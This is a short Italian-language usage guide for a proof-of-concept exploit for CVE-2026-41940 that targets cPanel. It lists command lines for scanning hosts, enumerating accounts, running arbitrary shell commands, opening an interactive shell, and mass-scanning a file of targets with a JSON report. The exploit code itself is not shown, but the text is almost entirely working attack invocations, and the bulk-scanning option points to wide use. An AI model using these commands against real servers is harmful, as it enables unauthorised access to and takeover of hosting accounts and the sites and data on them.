
Proof-of-concept exploit per CVE-2026-41940 che prende di mira cPanel, consentendo enumerazione degli account, esecuzione di comandi e accesso interattivo alla shell su host vulnerabili.
python3 poc_CVE-2026-41940.py -h
Scansione di un singolo host
python3 poc_CVE-2026-41940.py -u https://target.example:2086
Elenca gli account dopo una catena riuscita
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action list
Esegue un comando shell
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action cmd --cmd 'id; whoami; uname -a'
Shell interattiva
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action shell
Target da file + report JSON
python3 poc_CVE-2026-41940.py -l targets.txt -t 20 -o results.json
ref : ynsmroztas